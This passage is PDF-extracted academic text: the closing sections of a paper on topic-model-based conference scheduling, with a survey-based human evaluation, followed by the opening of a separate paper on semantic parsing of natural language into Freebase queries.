Interestingly, the inclusion of constraints did not lead to a reduction in the discrimination ratios; in fact, the highest discrimination ratio (6.7) was obtained in the presence of constraints. Manda et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.234 18/28 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.234 No Constraints With Constraints Schedule creation algorithm M e a n d is c ri m in a ti o n ra ti o Starting schedules HCA SAA HCB SAB Figure 3 Mean discrimination ratio of starting and optimized Evolution 2014 schedules for the four optimization approaches applied to Random initial schedules with and without constraints. Error bars show two standard errors of the mean discrimination ratio among the 10 starting or final schedules. Full-size DOI: 10.7717/peerjcs.234/fig-3 Table 4 Comparison of HC and SA approaches, and, A and B variants of HC and SA with four dif- ferent initial schedules. Comparisons are made on the distributions of D for 10 final Evolution opti- mized schedules produced by each approach. Shown are p-values from two-sided un-paired t-tests at the Bonferroni-corrected threshold of α=0.002 (experiment-wide alpha=0.05 with n=24). Initial Schedule Comparison p Comparing HC with SA versions Random HCA vs. SAA 1.95e−08 Random HCB vs. SAB 8.44e−35 Random with Constraints HCA vs. SAA 1.54e−08 Random with Constraints HCB vs. SAB 4.06e−23 Comparing A with B variants Random HCA vs. HCB 3.23e−41 Random with Constraints HCA vs. HCB 8.52e−27 Random SAA vs. SAB 1.29e−21 Random with Constraints SAA vs. SAB 9.44e−23 We compared the D distributions using a Student’s t-test across 10 final schedules created HC and SA approaches with a Random initial schedule. Statistically significant differences were found between SA and HC versions with a Random initial schedule both with and without additional scheduling constraints (Table 4, rows 2–5). We also compared the performance of A and B variants of the HC and SA approaches. Statistically significant differences were found between A and B versions for both HC and SA approaches both with and without scheduling constraints (Table 4, rows 7–10). Preliminary labels can be generated for the automated sessions using information from the topic model. For example, for each talk in a session, we can determine the top two Manda et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.234 19/28 https://peerj.com https://doi.org/10.7717/peerjcs.234/fig-3 http://dx.doi.org/10.7717/peerj-cs.234 words from the top two relevant topics that describe the talk the best. This would result in a set of four words (assuming no redundancies) that represent each talk. The most frequently occurring words among the talks can be used to create a preliminary label, which can then be used to construct a session name by program organizers. Manual modification of Evolution 2014 schedule The SAA schedule with constraints, reported above, was then given to the Evolution 2014 program committee as a starting point. The program committee consisted of ten evolutionary biologists. Based on their subjective judgments, and following manual procedures that elude easy description, the committee members made a large number of changes to the placement of talks and sessions before finalizing the schedule for the conference. In addition, the program committee added extra sessions for special symposia that were not part of the pool of contributed talks. The changes made by the program committee were substantial; 0.50% of talk pairs that shared a session in the automated schedule were retained within the same session in the modified schedule, while 4.40% of talk pairs placed in concurrent sessions in the modified schedule had originally been placed together in the automated schedule. The value of D for the original automated schedule was 6.7, while that for the manually modified schedule was 3.2. Expert evaluation The differences between the automated and manually modified Evolution 2014 schedule provided an opportunity to conduct a human evaluation. We were particularly interested in comparing how tempted users would be to hop between sessions in each case. To that end, we presented a set of 29 volunteers with expertise in evolutionary biology, none of whom served on the program committee, with faux schedules compiled from the two different sources. Responses were captured via an online survey (University of North Carolina at Chapel Hill Institutional Review Board 15-0379). The respondents, recruited individually, included twenty-four early career researchers (graduate students and postdoctoral associates) and five faculty. Respondents were presented with one of eight faux schedules. Each schedule consisted of two timeslots. First, two timeslots each were randomly selected from the automated schedule and the manually modified schedule. These were then combined to produce all eight possible schedules consisting of one timeslot from the automated schedule and one from the modified schedule (Fig. 4). Each timeslot contained 14 concurrent sessions, and each session had a maximum of five talks. Each respondent was randomly assigned one of the faux conference schedules and a corresponding book of abstracts. Testing was blind in the sense that respondents were aware of the purpose of the study but not of which timeslot originated from which source (automated or manual). The survey contained two groups of questions. First, we asked respondents to select the five talks they would like to attend within each timeslot, irregardless of whether they were assigned to the same session. We could then compare the automated or modified timeslots with respect to how the selected talk pairs were grouped into common sessions. Manda et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.234 20/28 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.234 Figure 4 Generation of faux schedules for human evaluation. (A) The original automated and manually modified schedules are depicted here for purposes of illustration with six timeslots each. (B) Two timeslots from each schedule in (A) are randomly selected. (C) The eight possible schedules consisting of one each of the automated and modified timeslots. Full-size DOI: 10.7717/peerjcs.234/fig-4 Secondly, we asked respondents to choose one session to attend in its entirety in each timeslot and report on the difficulty of finding a session where all the talks interested them. Responses were scored on a Likert scale of one to five with one being ‘‘very difficult’’, and five being ‘‘very easy’’. These responses could then be used to compare the topical coherence of the sessions from the automated and modified schedules. If either of the schedules (automated or modified) were more effective than the other at capturing the topics of relevance to our sample of mock conference attendees, we would expect to see respondents (a) select more talks in the same session(s) and (b) select higher values on the Likert scale for timeslots from that schedule. With respect to (a), we found no significant difference in the number of same-session talk pairs between the automated and manual timeslots (unpaired t-test t =−0.720, p=0.474, n=29). With respect to (b), the responses for the automated and manually modified timeslots were quite similar in distribution (Fig. 5). The mode for the automated timeslots was four while that for the modified timeslots was three. Two respondents rated the selection ‘‘very easy’’ for the modified timeslot while none did for the automated one. While the expert evaluation does not reveal substantial differences between the automated and manually modified schedule in terms of preference by the survey takers, the limited size of the survey should be noted. DISCUSSION Manual scheduling of conferences is complicated, time intensive, and may often result in a suboptimal schedule with sessions that could be more topically coherent and timeslots in which sessions could be more topically disparate. Here, we have proposed and tested a strategy for automating the conference scheduling problem. In our approach, we first use topic modeling to identify latent topics and use the resulting weight vectors to measure similarity among talks and sessions. Stochastic optimization is then used to generate schedules according to the discrimination ratio, which simultaneously quantifies within-session coherence and between-session disparity. In a comparison of different approaches for generating starting schedules and improving upon them, we found that Integer Linear Programming produced the best starting schedule, but that further stochastic optimization greatly improved upon the solution found by ILP. Manda et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.234 21/28 https://peerj.com https://doi.org/10.7717/peerjcs.234/fig-4 http://dx.doi.org/10.7717/peerj-cs.234 Figure 5 Responses of mock conference attendees when asked to rate the ease or difficulty of selecting a single session when presented with faux schedules containing one timeslot each from the automated and manually modified Evolution 2014 schedules. The scale ranges from one (very difficult) to five (very easy). Full-size DOI: 10.7717/peerjcs.234/fig-5 We attribute the inability of ILP to maximize the discrimination ratio to the heuristic compromise of splitting the problem into smaller sub-problems, which was necessitated by the size of the real-world problem instances. We also found that the initial schedule had little to no effect on the discrimination ratio of the final schedule. Thus, we recommend using a random or greedy algorithm to generate the starting schedule, since these approaches are less computationally expensive and easier to implement. We found that Simulated Annealing performed better than naive Hill Climbing as a stochastic optimization strategy. If the results we obtained for the Ecology 2013 dataset are representative, and we accept the discrimination ratio is a reasonable objective function, then it appears that manually generated schedules can be far from optimal. This could be due to a number of reasons, apart from the obvious explanation that the combinatorial space of possible schedules is too large for humans to effectively search and evaluate. We cannot exclude that human conference organizers weigh additional factors (e.g., aiming for presenters within a session to represent a mix of different career stages). We would expect some difference between human perception of talk similarity and the inference of the same based on a topic model. And we would also expect a difference in how humans weigh coherence within sessions and disparity between sessions. In fact, we did receive feedback from Evolution 2014 organizers that we should consider coherence first and disparity second. However, we saw that schedules produced in this way were inferior as judged by the discrimination ratio, although we do not know if they would be judged inferior by humans. This might be due to the way the algorithm operates—optimizing coherence within sessions first without regard to disparity between concurrent sessions. Once the coherence with sessions has been optimized, the algorithm is not allowed to change the placement of talks in sessions to maximize disparity but can only Manda et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.234 22/28 https://peerj.com https://doi.org/10.7717/peerjcs.234/fig-5 http://dx.doi.org/10.7717/peerj-cs.234 change the placement of the concurrent sessions with respect to each other. This results in a smaller search space for increasing disparity between concurrent sessions which might lead to lower D scores for schedules produced using these approaches. Scheduling constraints are a regular feature of conferences, and initially we anticipated that they would be more troublesome than they ultimately proved to be. We found no decrease in discrimination ratio when incorporating constraints in the Evolution 2014 schedule. We hypothesize that the applied scheduling constraints were not restrictive enough to substantially limit the search space. For context, while approximately 24% of the talks had scheduling constraints, the majority could still be placed in 91% of sessions. In cases where constraints are more restrictive, one could modify the approach here to accept solutions that minimize the number of constraints violated, or weight the constraints such that solutions aim to minimize the total weight of violated constraints. With the Evolution 2014 schedule, we took advantage of the opportunity to conduct a preliminary investigation into how much session-hopping users felt would be necessary in the automated schedule versus the manually modified one. By the two measures we looked at, prospective conference goers with expertise in the field found the two schedules to be comparable. Given the substantial changes made to the automated schedule, it was perhaps surprising that results did not show greater differences. One possible interpretation of this result is that while the conference organizers may have modified the schedule in an effort to optimize their own subjective similarity and disparity measures, they did not improve upon the automated schedule from the perspective of a community of conference attendees with diverse interests. This also suggests that it would be reasonable for future conference organizers to use an automated schedule as is, without expending additional human effort vainly trying to improve upon it. However, a number of limitations with this experiment should be noted. The sample size was small and a limited array of schedules were presented for evaluation. While all survey participants had expertise in some area of evolutionary biology, we might have been asking them to evaluate sessions outside of their specific interests. And they were tested in an artificial setting; their behavior in navigating a real conference schedule may differ. Taken together, we believe this work makes a number of contributions. First, topic modeling provides a reasonable input for automated clustering of conference abstracts. The scalability of this approach is attractive for large conferences. Secondly, D is a reasonable objective function, though a difficult one for humans to manually optimize. It’s value lies in capturing both similarity within and dissimilarity between sessions, the latter of which has been previously neglected. Third, we have identified fast heuristics for optimizing D. FUTURE WORK Would it be possible to improve upon this approach such that an automated schedule would be preferred by a future organizing committee to a manually generated, or manually modified, schedule? One area for potential improvement would be to customize the weights given to topics based on the perceived importance of conference attendees. In the approach described here, each topic received equal weight. However, a community of scientists may Manda et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.234 23/28 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.234 consider some topics more important than others. Values for the weights could be gathered by means of a survey or other user-contributed data. If topics were mapped to an ontology, weights related to the information content of topics could provide an indirect measure of importance (Resnik, 1995) without the need for a survey. Given the comparable performance of the automated and manually modified Evolution 2014 schedules, it would be of interest to further examine how well statistical measures of topic similarity between talks match human perception. For similarity measures that do match well, it would then be of interest to see how sensitive humans are to schedules with very different levels of D, or to independently varying levels of similarity within sessions and dissimilarity between sessions. Another pair of factors not considered was co-author and co-citation networks. Intuitively, talks that are closely linked in either kind of network may be similar in ways that are somewhat independent of how they are related by the topic model (Yan & Ding, 2012). Use of such network information could also help ensure that talks by individuals with strong intellectual ties are assigned to the same session or at least not assigned to different concurrent sessions. Our implementation limits concurrent sessions to those that overlap fully. Conferences sometimes schedule sessions of differing lengths that partially overlap with one another, and accommodating this in future versions could allow for greater flexibility. The heuristic approaches presented here have not been evaluated with respect to an exact approach with an optimality guarantee. Future work may consider developing exact approaches, such as Mixed-Integer Linear Programming, to better understand the computational bounds of these approaches and investigate if the heuristics proposed here are substantially faster as compared to exact approaches and if the solutions are comparable. CONCLUSIONS Automated scheduling of large conferences is a problem of great interest and utility to scientists across various domains. Here, we presented heuristic algorithms for the creation and optimization of conference schedules with concurrent sessions based on an objective function. The methods presented here are capable of ‘‘reading’’ conference talks, assessing similarities between the talks, and using those similarities to populate conference sessions. While these methods are a step forward in the field of automated conference scheduling, further work is needed to develop objective functions that accurately reflect user perception of ‘‘good’’ conference schedules. DATA AND SOFTWARE AVAILABILITY Data and software for this work are available at https://doi.org/10.5281/zenodo.2860367. ACKNOWLEDGEMENTS We wish to thank J Scott Provan for his guidance on implementing the ILP schedule creation approach. We thank the Evolution 2014 program committee (J Cryan, E Lacey, Manda et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.234 24/28 https://peerj.com https://doi.org/10.5281/zenodo.2860367 http://dx.doi.org/10.7717/peerj-cs.234 K Pfennig, B Langerhans, C McClain, B O’Meara, A Rodrigo, M Servedio, J Shaw and J Thorne) for their time and expertise in preparing the final Evolution schedule from our automated preliminary schedule. We thank our survey participants who enabled us to enable comparisons of the automated and manual schedules. Finally, we extend our thanks to Christian Santiago, Daphne Klotsa, David Egolf, Itai Cohen, John Crocker, Karen Daniels, Michelle Driscoll, and Peter Olmsted from the American Physical Society for providing pictures of preparing the schedule for their 2017 meeting. ADDITIONAL INFORMATION AND DECLARATIONS Funding This work was supported by the National Evolutionary Synthesis Center and the National Science Foundation through EF-0905606 and DBI-1062542. The funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript. Grant Disclosures The following grant information was disclosed by the authors: National Evolutionary Synthesis Center and the National Science Foundation: EF-0905606, DBI-1062542. Competing Interests Todd J. Vision is an Academic Editor for PeerJ. Katherine Lamm is employed by ROI Revolution, Inc. Author Contributions • Prashanti Manda conceived and designed the experiments, performed the experiments, analyzed the data, contributed reagents/materials/analysis tools, prepared figures and/or tables, performed the computation work, authored or reviewed drafts of the paper, approved the final draft. • Alexander Hahn performed the experiments, analyzed the data, contributed reagents/materials/analysis tools, prepared figures and/or tables, performed the computation work, approved the final draft. • Katherine Beekman conceived and designed the experiments, performed the experiments, analyzed the data, contributed reagents/materials/analysis tools, performed the computation work, approved the final draft. • Todd J. Vision conceived and designed the experiments, contributed reagents/material- s/analysis tools, prepared figures and/or tables, authored or reviewed drafts of the paper, approved the final draft. Ethics The following information was supplied relating to ethical approvals (i.e., approving body and any reference numbers): The University of North Carolina at Chapel Hill granted IRB approval for a survey conducted as part of this study (IRB 15-0379). Manda et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.234 25/28 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.234 Data Availability The following information was supplied regarding data availability: Data and software for this work are available at Zenodo: Manda, Prashanti, Hahn, Alexander, Lamm, Katherine, & Vision, Todd. (2019, May 16). Avoiding ’’conflicts of interest’’: A computational approach to scheduling parallel conference tracks and its human evaluation - Data and Software. Zenodo. http://doi.org/10.5281/zenodo.2860367. Supplemental Information Supplemental information for this article can be found online at http://dx.doi.org/10.7717/ peerj-cs.234#supplemental-information. REFERENCES André P, Zhang H, Kim J, Chilton L, Dow SP, Miller RC. 2013. Community clustering: Leveraging an academic crowd to form coherent conference sessions. In: First AAAI conference on human computation and crowdsourcing. Bhardwaj A, Kim J, Dow S, Karger D, Madden S, Miller R, Zhang H. 2014. Attendee- sourcing: exploring the design space of community-informed conference scheduling. In: Second AAAI conference on human computation and crowdsourcing. Blei DM, Lafferty JD. 2005. Correlated topic models. In: Proceedings of the 18th interna- tional conference on neural information processing systems. 147–154. Blei DM, Ng AY, Jordan MI. 2003. Latent Dirichlet allocation. Journal of Machine Learning Research 3:993–1022. Bosch R, Trick M. 2005. Integer programming. In: Search methodologies. Boston: Springer, 69–95. Celebi ME, Kingravi HA, Vela PA. 2013. A comparative study of efficient initialization methods for the k-means clustering algorithm. Expert Systems with Applications 40(1):200–210 DOI 10.1016/j.eswa.2012.07.021. Chang J, Blei DM. 2009. Relational topic models for document networks. In: Interna- tional conference on artificial intelligence and statistics. 81–88. Chang J, Gerrish S, Wang C, Boyd-graber JL, Blei DM. 2009. Reading tea leaves: how humans interpret topic models. In: Advances in neural information processing systems. 288–296. Chilton LB, Kim J, André P, Cordeiro F, Landay JA, Weld DS, Dow SP, Miller RC, Zhang H. 2014. Frenzy: collaborative data organization for creating conference sessions. In: Proceedings of the 32nd annual ACM conference on human factors in computing systems. 1255–1264. Edis E, Edis RS. 2013. An integer programming model for the conference timetabling problem-konferans çizelgeleme problemi için bir tamsayili programlama modeli. Celal Bayar Üniversitesi Fen Bilimleri Dergisi 9(2):55–62. Eglese R, Rand G. 1987. Conference seminar timetabling. Journal of the Operational Research Society 38(7):591–598 DOI 10.1057/jors.1987.102. Manda et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.234 26/28 https://peerj.com http://doi.org/10.5281/zenodo.2860367 http://dx.doi.org/10.7717/peerj-cs.234#supplemental-information http://dx.doi.org/10.7717/peerj-cs.234#supplemental-information http://dx.doi.org/10.1016/j.eswa.2012.07.021 http://dx.doi.org/10.1057/jors.1987.102 http://dx.doi.org/10.7717/peerj-cs.234 Fox C. 1989. A stop list for general text. In: ACM SIGIR Forum, vol. 24. New York: Association for Computing Machinery, 19–21. Gay DM, Kernighan BW. 2002. Ampl: a modeling language for mathematical program- ming. Duxbury-Thomson 36:1–526. Gonzalez TF. 1985. Clustering to minimize the maximum intercluster distance. Theoreti- cal Computer Science 38:293–306 DOI 10.1016/0304-3975(85)90224-5. Gulati M, Sengupta A. 2004. TRACS: Tractable conference scheduling. In: Proceedings of the decision sciences institute annual meeting (DSI 2004). 3161–3166. Hillis DM. 2013. Evolution 2013: the good, the better, and the future. Available at http: //treethinkers.org/evolution-2013-the-good-the-better-and-the-future/ . Houlding B, Haslett J. 2013. Scheduling parallel conference sessions: an application of a novel hybrid clustering algorithm for ensuring constrained cardinality. Journal of Applied Statistics 40(5):961–971 DOI 10.1080/02664763.2012.760239. Ibrahim H, Ramli R, Hassan MH. 2008. Combinatorial design for a conference: con- structing a balanced three-parallel session schedule. Journal of Discrete Mathematical Sciences and Cryptography 11(3):305–317 DOI 10.1080/09720529.2008.10698186. Kim J, Zhang H, André P, Chilton LB, Bhardwaj A, Karger D, Dow SP, Miller RC. 2013. Cobi: community-informed conference scheduling. In: First AAAI conference on human computation and crowdsourcing. Kirkpatrick S, Gelatt CD, Vecchi MP. 1983. Optimization by simulated annealing. Science 220(4598):671–680 DOI 10.1126/science.220.4598.671. Kruskal JB. 1956. On the shortest spanning subtree of a graph and the traveling salesman problem. Proceedings of the American Mathematical Society 7(1):48–50 DOI 10.1090/S0002-9939-1956-0078686-7. Le Page Y. 1996. Optimized schedule for large crystallography meetings. Journal of Applied Crystallography 29(3):291–295 DOI 10.1107/S0021889896000647. Lovins JB. 1968. Development of a stemming algorithm. MIT Information Processing Group, Electronic Systems Laboratory. Nicholls M. 2007. A small-to-medium-sized conference scheduling heuristic incorporat- ing presenter and limited attendee preferences. Journal of the Operational Research Society 58(3):301–308 DOI 10.1057/palgrave.jors.2602144. Porter M. 2001. Snowball: a language for stemming algorithms. Available at https:// tartarus.org/martin/PorterStemmer/index.html. Porter MF. 1980. An algorithm for suffix stripping. Program 14(3):130–137 DOI 10.1108/eb046814. Potthoff RF, Munger MC. 2003. Use of integer programming to optimize the scheduling of panels at annual meetings of the Public Choice Society. Public Choice 117(1– 2):163–175 DOI 10.1023/A:1026101608593. Quesnelle J, Steffy D. 2015. Scheduling a conference to minimize attendee preference conflicts. In: Proceedings of the 7th multidisciplinary international conference on scheduling: theory and applications (MISTA). 379–392. Manda et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.234 27/28 https://peerj.com http://dx.doi.org/10.1016/0304-3975(85)90224-5 http://treethinkers.org/evolution-2013-the-good-the-better-and-the-future/ http://treethinkers.org/evolution-2013-the-good-the-better-and-the-future/ http://dx.doi.org/10.1080/02664763.2012.760239 http://dx.doi.org/10.1080/09720529.2008.10698186 http://dx.doi.org/10.1126/science.220.4598.671 http://dx.doi.org/10.1090/S0002-9939-1956-0078686-7 http://dx.doi.org/10.1107/S0021889896000647 http://dx.doi.org/10.1057/palgrave.jors.2602144 https://tartarus.org/martin/PorterStemmer/index.html https://tartarus.org/martin/PorterStemmer/index.html http://dx.doi.org/10.1108/eb046814 http://dx.doi.org/10.1023/A:1026101608593 http://dx.doi.org/10.7717/peerj-cs.234 Resnik P. 1995. Using information content to evaluate semantic similarity in a taxon- omy. In: Proceedings of the 14th international joint conference on artificial intelligence. 448–453. Sampson SE. 2009. Practical implications of preference-based conference scheduling. Production and Operations Management 13(3):205–215 DOI 10.1111/j.1937-5956.2004.tb00506.x. Spall JC. 2012. Stochastic optimization. In: Handbook of computational statistics. Heidelberg: Springer-Verlag, 173–201. Stidsen T, Pisinger D, Vigo D. 2018. Scheduling EURO-k conferences. European Journal of Operational Research 270(3):1138–1147 DOI 10.1016/j.ejor.2017.10.015. Tanaka M, Mori Y. 2002. A hybrid grouping genetic algorithm for timetabling of conference programs. In: Proceedings of the 4th international conference on the practice and theory of automated timetabling (PATAT 2002). 421–440. Tanaka M, Mori Y, Bargiela A. 2002. Granulation of keywords into sessions for timetabling conferences. In: Proceedings of soft computing and intelligent systems (SCIS 2002). 1–5. Vangerven B, Ficker AM, Goossens DR, Passchyn W, Spieksma FC, Woeginger GJ. 2018. Conference scheduling—a personalized approach. Omega 81:38–47 DOI 10.1016/j.omega.2017.09.007. Wallach HM. 2006. Topic modeling: beyond bag-of-words. In: Proceedings of the 23rd international conference on machine learning. ACM, 977–984 DOI 10.1145/1143844.1143967. Yan E, Ding Y. 2012. Scholarly network similarities: how bibliographic coupling networks, citation networks, cocitation networks, topical networks, coauthorship networks, and coword networks relate to each other. Journal of the American Society for Information Science and Technology 63:1313–1326 DOI 10.1002/asi.22680. Manda et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.234 28/28 https://peerj.com http://dx.doi.org/10.1111/j.1937-5956.2004.tb00506.x http://dx.doi.org/10.1016/j.ejor.2017.10.015 http://dx.doi.org/10.1016/j.omega.2017.09.007 http://dx.doi.org/10.1145/1143844.1143967 http://dx.doi.org/10.1002/asi.22680 http://dx.doi.org/10.7717/peerj-cs.234 work_i6l4k3m3zba3nlvdwx2wumw2fe ---- Large-scale Semantic Parsing without Question-Answer Pairs Siva Reddy, Mirella Lapata, Mark Steedman School of Informatics, University of Edinburgh 10 Crichton Street, Edinburgh EH8 9AB siva.reddy@ed.ac.uk, mlap@inf.ed.ac.uk, steedman@inf.ed.ac.uk Abstract In this paper we introduce a novel semantic parsing approach to query Freebase in natu- ral language without requiring manual anno- tations or question-answer pairs. Our key in- sight is to represent natural language via se- mantic graphs whose topology shares many commonalities with Freebase. Given this rep- resentation, we conceptualize semantic pars- ing as a graph matching problem. Our model converts sentences to semantic graphs using CCG and subsequently grounds them to Free- base guided by denotations as a form of weak supervision. Evaluation experiments on a sub- set of the FREE917 and WEBQUESTIONS benchmark datasets show our semantic parser improves over the state of the art. 1 Introduction Querying a database to retrieve an answer, telling a robot to perform an action, or teaching a com- puter to play a game are tasks requiring communi- cation with machines in a language interpretable by them. Semantic parsing addresses the specific task of learning to map natural language (NL) to machine interpretable formal meaning representations. Tra- ditionally, sentences are converted into logical form grounded in the symbols of some fixed ontology or relational database. Approaches for learning semantic parsers have been for the most part supervised, using annotated training data consisting of sentences and their cor- responding logical forms (Zelle and Mooney, 1996; Zettlemoyer and Collins, 2005; Wong and Mooney, 2007; Kwiatkowski et al., 2010). More recently, al- ternative forms of supervision have been proposed to alleviate the annotation burden, e.g., by learn- ing from conversational logs (Artzi and Zettlemoyer, 2011), from sentences paired with system behav- ior (Chen and Mooney, 2011; Goldwasser and Roth, Question What is the capital of Texas? Logical Form λx. city(x)∧capital(x,Texas) Answer {Austin} Figure 1: An example question with annotated logi- cal query, and its answer. 2011; Artzi and Zettlemoyer, 2013), via distant su- pervision (Krishnamurthy and Mitchell, 2012; Cai and Yates, 2013), from questions (Goldwasser et al., 2011; Poon, 2013; Fader et al., 2013), and question- answer pairs (Clarke et al., 2010; Liang et al., 2011). Indeed, methods which learn from question-answer pairs have been gaining momentum as a means of scaling semantic parsers to large, open-domain problems (Kwiatkowski et al., 2013; Berant et al., 2013; Berant and Liang, 2014; Yao and Van Durme, 2014). Figure 1 shows an example of a question, its annotated logical form, and answer (or denotation). In this paper, we build a semantic parser that does not require example annotations or question-answer pairs but instead learns from a large knowledge base (KB) and web-scale cor- pora. Specifically, we exploit Freebase, a large community-authored knowledge base that spans many sub-domains and stores real world facts in graphical format, and parsed sentences from a large corpus. We formulate semantic parsing as a graph matching problem. We convert the output of an open-domain combinatory categorial gram- mar (CCG) parser (Clark and Curran, 2007) into a graphical representation and subsequently map it onto Freebase. The parser’s graphs (also called un- grounded graphs) are mapped to all possible Free- base subgraphs (also called grounded graphs) by re- placing edges and nodes with relations and types in Freebase. Each grounded graph corresponds to a unique grounded logical query. During learning, our semantic parser is trained to identify which KB sub- graph best corresponds to the NL graph. Problem- capital(Austin)∧UNIQUE(Austin)∧capital.of.arg1(e,Austin)∧capital.of.arg2(e,Texas) (a) Semantic parse of the sentence Austin is the capital of Texas. capital capital unique Austin e Texas ty p e capital. of.arg1 capital. of.arg2 unique(Austin) ∧ capital(Austin)∧ capital.of.arg1(e, Austin) ∧ capital.of.arg2(e, Texas) (b) Ungrounded graph for semantic parse (a); UNIQUE means that Austin is the only capital of Texas. capital capital target x e Texas ty p e capital. of.arg1 capital. of.arg2 target(x) ∧ capital(x) ∧ capital.of.arg1(e, x) ∧ capital.of.arg2(e, Texas) {AUSTIN} (c) Query graph after removing Austin from graph (b) and its denotation. location .city capital target x m Texas ty p e location. capital.arg1 location. capital.arg2 target(x) ∧ location.city(x) ∧ location.capital.arg1(m, x) ∧ location.capital.arg2(m, Texas) location .city capital target x n Texas ty p e location. containedby.arg1 location. containedby.arg2 target(x) ∧ location.city(x) ∧ location.containedby.arg1(n, x) ∧ location.containedby.arg2(n, Texas) {AUSTIN} {AUSTIN, DALLAS, HOUSTON ... } (d) Freebase graphs for NL graph (c) and their denotations. Figure 2: Steps involved in converting a natural language sentence to a Freebase grounded graph. atically, ungrounded graphs may give rise to many grounded graphs. Since we do not make use of manual annotations of sentences or question-answer pairs, we do not know which grounded graphs are correct. To overcome this, we rely on comparisons between denotations of natural language queries and related Freebase queries as a form of weak supervi- sion in order to learn the mapping between NL and KB graphs. Figure 2 illustrates our approach for the sentence Austin is the capital of Texas. From the CCG syn- tactic derivation (which we omit here for the sake of brevity) we obtain a semantic parse (Figure 2a) and convert it to an ungrounded graph (Figure 2b). Next, we select an entity from the graph and replace it with a variable x, creating a graph corresponding to the query What is the capital of Texas? (Figure 2c). The math function UNIQUE on Austin in Figure 2b indi- cates Austin is the only value of x which can satisfy the query graph in Figure 2c. Therefore, the denota- tion1 of the NL query graph is {AUSTIN}. Figure 2d shows two different groundings of the query graph in the Freebase KB. We obtain these by replacing edges and nodes in the query graph with Freebase relations and types. We use the denotation of the NL query as a form of weak supervision to select the best grounded graph. Under the constraint that the denotation of a Freebase query should be the same as the denotation of the NL query, the graph on the left hand-side of Figure 2d is chosen as the correct grounding. Experimental results on two benchmark datasets consisting of questions to Freebase — FREE917 (Cai and Yates, 2013) and WEBQUESTIONS (Berant 1The denotation of a graph is the set of feasible values for the nodes marked with TARGET. et al., 2013) — show that our semantic parser im- proves over state-of-the-art approaches. Our contri- butions include: a novel graph-based method to con- vert natural language sentences to grounded seman- tic parses which exploits the similarities in the topol- ogy of knowledge graphs and linguistic structure, to- gether with the ability to train using a wide range of features; a proposal to learn from a large scale web corpus, without question-answer pairs, based on denotations of queries from natural language statements as weak supervision; and the develop- ment of a scalable semantic parser which besides Freebase uses CLUEWEB09 for training, a corpus of 503.9 million webpages. Our semantic parser can be downloaded from http://sivareddy.in/ downloads. 2 Framework Our goal is to build a semantic parser which maps a natural language sentence to a logical form that can be executed against Freebase. We begin with CLUEWEB09, a web-scale corpus automatically an- notated with Freebase entities (Gabrilovich et al., 2013). We extract the sentences containing at least two entities linked by a relation in Freebase. We parse these sentences using a CCG syntactic parser, and build semantic parses from the syntactic out- put. Semantic parses are then converted to seman- tic graphs which are subsequently grounded to Free- base. Grounded graphs can be easily converted to a KB query deterministically. During training we learn which grounded graphs correspond best to the natural language input. In the following, we pro- vide a brief introduction to Freebase and its graph structure. Next, we explain how we obtain seman- tic parses from CCG (Section 2.2), how we convert them to graphs (Section 2.3), and ground them in Freebase (Section 2.4). Section 3 presents our learn- ing algorithm. 2.1 The Freebase Knowledge Graph Freebase consists of 42 million entities and 2.5 bil- lion facts. A fact is defined by a triple containing two entities and a relation between them. Entities represent real world concepts, and edges represent relations, thus forming a graph-like structure. A Freebase subgraph is shown in Figure 3 with usa natasha obama p q US president r s Columbia University m Barack Obama n Michelle Obama m m n n education .university Bachelor of Arts 1992 h e a d q u a rt e rs .c o u n tr y h e a d q u a rt e rs .o rg a n is a ti o n person. nationality.arg2 person. nationality.arg1 pe rs on . pa re nt s. ar g2 pe rs on . pa re nt s. ar g1 p e rso n . p a re n ts.a rg 2 p e rso n . p a re n ts.a rg 1 education. institution education .student marriage .spouse marriage .spouse education .institution education .degree e d u c a ti o n .d e g re e e d u c a ti o n .s tu d e n t m arriage .from m arriage .spouse m a rr ia g e .f ro m m a rr ia g e .s p o u se ty p e ty p e Figure 3: Freebase knowledge graph. Entities are represented by rectangles, relations between enti- ties by edges, mediator nodes by circles, types by rounded rectangles. rectangles denoting entities. In addition to sim- ple facts, Freebase encodes complex facts, repre- sented by multiple edges (e.g., the edges connect- ing BARACK OBAMA, COLUMBIA UNIVERSITY and BACHELOR OF ARTS). Complex facts have in- termediate nodes called mediator nodes (circles in Figure 3 with the same identifiers e.g., m and n). For reasons of uniformity, we assume that simple facts are also represented via mediator nodes and split single edges into two with each subedge going from the mediator node to the target node (see per- son.nationality.arg1 and person.nationality.arg2 in Fig- ure 3). Finally, Freebase also has entity types defin- ing is-a relations. In Figure 3 types are represented by rounded rectangles (e.g., BARACK OBAMA is of type US president, and COLUMBIA UNIVERSITY is of type education.university). 2.2 Combinatory Categorial Grammar The graph like structure of Freebase inspires us to create a graph like structure for natural lan- guage, and learn a mapping between them. To do this we take advantage of the representational power of Combinatory Categorial Grammar (Steed- man, 2000). CCG is a linguistic formalism that tightly couples syntax and semantics, and can be used to model a wide range of language phenom- Cameron directed Titanic NP (S\NP)/NP NP Cameron λyλx. directed.arg1(e,x) Titanic ∧ directed.arg2(e,y) > S\NP λx. directed.arg1(e,x) ∧ directed.arg2(e, Titanic) < S directed.arg1(e, Cameron)∧ directed.arg2(e, Titanic) 1 Figure 4: CCG derivation containing both syntactic and semantic parse construction. ena. CCG is well known for capturing long-range dependencies inherent in constructions such as co- ordination, extraction, raising and control, as well as standard local predicate-argument dependencies (Clark et al., 2002), thus supporting wide-coverage semantic analysis. Moreover, due to the transparent interface between syntax and semantics, it is rela- tively straightforward to built a semantic parse for a sentence from its corresponding syntactic derivation tree (Bos et al., 2004). In our case, the choice of syntactic 